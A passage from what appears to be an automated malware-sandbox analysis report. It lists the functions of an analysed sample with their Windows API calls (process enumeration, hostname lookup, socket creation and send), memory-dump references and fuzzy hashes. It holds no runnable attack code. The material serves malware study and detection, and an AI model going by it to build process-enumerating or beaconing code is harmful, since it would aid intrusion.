                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: gethostname
                                                  • String ID:
                                                  • API String ID: 144339138-0
                                                  • Opcode ID: e860027f17380108c1bcaf57f91152f3f347a674c8178e764ac591a57189dbee
                                                  • Instruction ID: dce71151365f852b5e8329f91494aa7e8fae7682873284e5e001935c78f4004b
                                                  • Opcode Fuzzy Hash: e860027f17380108c1bcaf57f91152f3f347a674c8178e764ac591a57189dbee
                                                  • Instruction Fuzzy Hash: BF51DFB06007818BEB389B26DD497237AD8BF44315F04183DE9CAC66D2EB74E844CF02
                                                  Function 07290351 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: b4721172f2a02bd0e8d3e6511b25376c929b4e9ac46bbe75e3d54b17c88598d1
                                                  • Instruction ID: 75c4dcf37b3f2f9527c196256b9006ad1db526cd7033e3cb9e3576365f760b73
                                                  • Opcode Fuzzy Hash: b4721172f2a02bd0e8d3e6511b25376c929b4e9ac46bbe75e3d54b17c88598d1
                                                  • Instruction Fuzzy Hash: FC3193EB17C11BBE656340811B54AF76B2EF5D3770B389476B807DAA42E2C84B5E1071
                                                  Function 07290368 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: c95783c8e6533d37de1b16c0e13c2dcee1c90126d7c130086f63f15f7896b386
                                                  • Instruction ID: cf27b3cad0fa693a971e447f761e9d2d36a3dd0994ec645c3c4e5ce3a40775b2
                                                  • Opcode Fuzzy Hash: c95783c8e6533d37de1b16c0e13c2dcee1c90126d7c130086f63f15f7896b386
                                                  • Instruction Fuzzy Hash: 492171EB17C12BBD696340812B19AF65A2EF5D3770B389436B407DAA42E2C44A5E1071
                                                  Function 07290424 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: 8fca3b9a0eda7fda0f1b9fb7637d3c74ed67dd1bc298eff125d59747a85931e6
                                                  • Instruction ID: 533f20770af15c6eeb79c5f846552e33275bc985cead65e9e1e5c1357e1df139
                                                  • Opcode Fuzzy Hash: 8fca3b9a0eda7fda0f1b9fb7637d3c74ed67dd1bc298eff125d59747a85931e6
                                                  • Instruction Fuzzy Hash: E12149EB1BC15BBEDA2341941B05BF66F1EB7D3730F389036A407DBA42E2C4865A0161
                                                  Function 07290471 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: 7c9af361db8e035abe22707b5d068e87bde45c4e785014f68e52acbb38252f23
                                                  • Instruction ID: 35eba0e9dd3dd23cf5d5749673ff8298488189077bf11c85bff4e31c6d22b987
                                                  • Opcode Fuzzy Hash: 7c9af361db8e035abe22707b5d068e87bde45c4e785014f68e52acbb38252f23
                                                  • Instruction Fuzzy Hash: DF2107EB2BC15BBE9A7341851B44AF66F2FB793770F3C9072A007DA643F2C44A4A0161
                                                  Function 072903AA Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: 62fcaa60203f595aeaa79a5d5e047de42f6424cc0207c32c2eab4016fec965c8
                                                  • Instruction ID: b350682aa24d737cdb8fe631c86c7c79024f344a70692cb7c43cd57542dedc17
                                                  • Opcode Fuzzy Hash: 62fcaa60203f595aeaa79a5d5e047de42f6424cc0207c32c2eab4016fec965c8
                                                  • Instruction Fuzzy Hash: 821181DB17C01BBE697740851B146F66A2FB6E7770F3890367407DAA42E6C44B5D1071
                                                  Function 072903B6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: 96b3ed701352d9f77ddac9530514af18575e9075f8f8b6060c95dbad2bf0e57f
                                                  • Instruction ID: 651232668c633a0856e71d0ea5f354eae7a94d23ab0ba21dc861170d12572f48
                                                  • Opcode Fuzzy Hash: 96b3ed701352d9f77ddac9530514af18575e9075f8f8b6060c95dbad2bf0e57f
                                                  • Instruction Fuzzy Hash: CE1190DB1BC01BBE697340851B54AF66A2FB6E3770F3890327407EAA42A2C84B5E1071
                                                  Function 072903DC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: 90ed152157ab53922d9c8d453103fdffa7e476d0e37a30dc379ed5b77de0836c
                                                  • Instruction ID: 1650d07a1583982031ae24f1586331af793ffc6f7a2b423dfac7610e8879a4b8
                                                  • Opcode Fuzzy Hash: 90ed152157ab53922d9c8d453103fdffa7e476d0e37a30dc379ed5b77de0836c
                                                  • Instruction Fuzzy Hash: 111106EB17C05BBE596341851B146F66B2FB6A3770F3890326407EB643E2C40B5A0071
                                                  Function 072903F9 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: c75e213320889ffd5cb7cafbd7a7681a989ed528922804a3c06b38581eda3b9c
                                                  • Instruction ID: 29fa5c9eeab49cd4ff6fd95a2005daf6cd998899b6d0138e946034022ac9c816
                                                  • Opcode Fuzzy Hash: c75e213320889ffd5cb7cafbd7a7681a989ed528922804a3c06b38581eda3b9c
                                                  • Instruction Fuzzy Hash: 031126EB17C01BBE697340855B046F66E2FB6D7730F389036B407DBA42E2C40B595072
                                                  Function 0729045C Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  • Opcode ID: c77bee046ff2359f23a80343183551f659c97122a01d3f2b4046ddf7f8b694a3
                                                  • Instruction ID: e818ae36d4fa5caf11c4504bbfd7224e6319d6da03d9f05a8e05e6dea97606f8
                                                  • Opcode Fuzzy Hash: c77bee046ff2359f23a80343183551f659c97122a01d3f2b4046ddf7f8b694a3
                                                  • Instruction Fuzzy Hash: 8301F5DB1BC11BBDA86340811B046F76A6FB2E7730F3890327407E6A83F2C41A4A1071
                                                  Function 005FAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 005FAFD1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  • Opcode ID: c90527c111f711a1fd9546e3aae790199c0dd5448bba707f204959dec30108e7
                                                  • Instruction ID: 0cae72e0084ce44641c6d949e49d9e70038014631ee5b4f0d892d37298fb240b
                                                  • Opcode Fuzzy Hash: c90527c111f711a1fd9546e3aae790199c0dd5448bba707f204959dec30108e7
                                                  • Instruction Fuzzy Hash: E4119670808785D6EB268F18D8027F6B7F8FFD4329F109A18E69946150F7365AC58BC2
                                                  Function 005FA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 005FA97E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: a0419478db9738e9b329d82c0eae938e531763846a96094ab152d20d11dfcef0
                                                  • Instruction ID: 7f793a8ce283ee7e00f90e0f71417dd4818ffb333339e1b98802e9266228af2d
                                                  • Opcode Fuzzy Hash: a0419478db9738e9b329d82c0eae938e531763846a96094ab152d20d11dfcef0
                                                  • Instruction Fuzzy Hash: 4F01A7B57117149FC6148F14DC45B56BBA5FFC4720F068569EA981B361C331AC108BD2
                                                  Function 005FAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(?,005FB280,00000000,-00000001,00000000,005FB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 005FAF67
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID:
                                                  • API String ID: 98920635-0
                                                  • Opcode ID: 8595a100e1d632a803b42a486da3a4599884a5c676d1bdd4c88c0edef7e71c6a
                                                  • Instruction ID: cc04080563156a47062160627a749a1e8b5754728264e247b76b0a2e33a41eca
                                                  • Opcode Fuzzy Hash: 8595a100e1d632a803b42a486da3a4599884a5c676d1bdd4c88c0edef7e71c6a
                                                  • Instruction Fuzzy Hash: 13E0EDB6A093216BD654DB18F8449ABF769EFC4B20F055A49B95467304C330AC548BE2
                                                  Function 005FB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • closesocket.WS2_32(?,005F9422,?,?,?,?,?,?,?,?,?,?,?,w3^,009BCE00,00000000), ref: 005FB04D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: a89527b7bf251c1b5fe84c76a07bf0985239bcf3ca9518feddeae530bd77a074
                                                  • Instruction ID: 1d9f2fc9d785b8d37f0551b5a9d71fec77103d9f695733634c5c1c8fa6e864ef
                                                  • Opcode Fuzzy Hash: a89527b7bf251c1b5fe84c76a07bf0985239bcf3ca9518feddeae530bd77a074
                                                  • Instruction Fuzzy Hash: 7BD0C238300202D7DA209A14C8C8A677A2F7FD1710FA9CB68E12C4A164CB3FCC43C602
                                                  Function 005967E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ioctlsocket.WS2_32(?,8004667E,?,?,0056AF56,?,00000001), ref: 005967FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: ioctlsocket
                                                  • String ID:
                                                  • API String ID: 3577187118-0
                                                  • Opcode ID: 18e70bf2d9553d036f4478a0d2cd915337566daa7e3960ebb93a5e03882792e6
                                                  • Instruction ID: 5e253e6f4d17d3cce8d5f90fa08ae5605b364ea2c1047a18a1663653463cc68a
                                                  • Opcode Fuzzy Hash: 18e70bf2d9553d036f4478a0d2cd915337566daa7e3960ebb93a5e03882792e6
                                                  • Instruction Fuzzy Hash: 3FC012F1119200AFC60C4724D955A2EB6D8DB44255F12591CB04692190EA349450CA1A
                                                  Function 005331D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: c0c447457f4215a8599fc0f193fd6194f226b4f29d7ad576ca0b4967f2bc4a9c
                                                  • Instruction ID: 8bc05103895e02766b0f465f42adb0679221efb77c664289b63ec5f4f158a0e5
                                                  • Opcode Fuzzy Hash: c0c447457f4215a8599fc0f193fd6194f226b4f29d7ad576ca0b4967f2bc4a9c
                                                  • Instruction Fuzzy Hash: A53192B49097159BCB00EFB8CA8569EBBF4BF44354F00886DE898E7341EB349A44CF52
                                                  Function 008BB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
